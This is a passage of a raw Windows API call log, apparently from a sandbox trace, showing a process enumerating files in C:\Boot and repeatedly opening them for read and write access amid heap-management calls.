dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.033] GetLastError () returned 0x5 [0069.033] GetLastError () returned 0x5 [0069.033] SetLastError (dwErrCode=0x5) [0069.033] GetLastError () returned 0x5 [0069.033] SetLastError (dwErrCode=0x5) [0069.033] GetLastError () returned 0x5 [0069.033] SetLastError (dwErrCode=0x5) [0069.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.034] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0069.034] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.034] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.034] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.034] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.034] AreFileApisANSI () returned 1 [0069.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BOOTSTAT.DAT", lpUsedDefaultChar=0x0) returned 21 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.034] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.034] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.035] AreFileApisANSI () returned 1 [0069.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0069.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4e3e8 [0069.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x4e3e8, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0069.035] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.036] GetFileType (hFile=0x420) returned 0x1 [0069.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0069.036] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.036] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.037] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.037] CloseHandle (hObject=0x420) returned 1 [0069.037] AreFileApisANSI () returned 1 [0069.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0069.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4e228 [0069.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x4e228, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0069.037] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.037] GetFileType (hFile=0x420) returned 0x1 [0069.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0069.037] CloseHandle (hObject=0x420) returned 1 [0069.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.038] AreFileApisANSI () returned 1 [0069.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4e0a0 [0069.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x4e0a0, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0069.038] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.038] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0069.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.039] AreFileApisANSI () returned 1 [0069.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bootvhd.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bootvhd.dll", lpUsedDefaultChar=0x0) returned 20 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.040] AreFileApisANSI () returned 1 [0069.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0069.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a8a8 [0069.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a8a8, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\bootvhd.dll") returned 20 [0069.040] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.040] GetFileType (hFile=0x420) returned 0x1 [0069.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8a8 | out: hHeap=0x20000) returned 1 [0069.041] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.041] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.041] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.041] CloseHandle (hObject=0x420) returned 1 [0069.041] AreFileApisANSI () returned 1 [0069.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0069.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7aae8 [0069.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7aae8, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\bootvhd.dll") returned 20 [0069.041] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.042] GetLastError () returned 0x5 [0069.042] GetLastError () returned 0x5 [0069.042] SetLastError (dwErrCode=0x5) [0069.042] GetLastError () returned 0x5 [0069.042] SetLastError (dwErrCode=0x5) [0069.042] GetLastError () returned 0x5 [0069.042] SetLastError (dwErrCode=0x5) [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aae8 | out: hHeap=0x20000) returned 1 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.042] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0069.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.042] AreFileApisANSI () returned 1 [0069.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\cs-CZ", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\cs-CZ", lpUsedDefaultChar=0x0) returned 14 [0069.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0069.043] AreFileApisANSI () returned 1 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\cs-CZ") returned 14 [0069.043] CreateFileW (lpFileName="C:\\Boot\\cs-CZ" (normalized: "c:\\boot\\cs-cz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.043] GetLastError () returned 0x5 [0069.043] GetLastError () returned 0x5 [0069.043] SetLastError (dwErrCode=0x5) [0069.043] GetLastError () returned 0x5 [0069.043] SetLastError (dwErrCode=0x5) [0069.043] GetLastError () returned 0x5 [0069.043] SetLastError (dwErrCode=0x5) [0069.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.043] AreFileApisANSI () returned 1 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88518 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88518, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\cs-CZ") returned 14 [0069.044] CreateFileW (lpFileName="C:\\Boot\\cs-CZ" (normalized: "c:\\boot\\cs-cz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 